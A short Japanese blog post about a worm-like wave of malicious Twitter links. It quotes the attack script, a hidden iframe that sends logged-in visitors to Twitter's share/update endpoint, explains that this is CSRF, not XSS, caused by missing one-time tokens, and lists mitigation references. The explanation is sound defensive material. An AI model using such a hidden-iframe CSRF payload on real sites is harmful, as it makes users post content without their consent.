Twitterでまた悪質リンクが横行――解決済み(ITmedia)
記事はXSSタグが付いているが、実際の攻撃はCSRFのようだ。
<script type="text/javascript"> var el1 = document.createElement('iframe'); el1.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" +window.location; document.getElementsByTagName("body")[0].appendChild(el1);
インラインフレームを仕込んで、ブラウザをhttp://twitter.com/share/updateにアクセスさせてるようです。
これにより、攻撃サイトのURLをユーザー(ログイン済み)に投稿させることに成功してます。
いわゆるワンタイムトークンと言ったhidden領域にパラメーターを仕込んで、リクエストの正当性をチェックする事をしていなかった為、インラインフレームへのアクセスが投稿の引き金に成り得た訳です.
CSRFの対策としては
・開発者のための正しいCSRF対策
・CSRF対策法と効果
等が参考になるかともいます。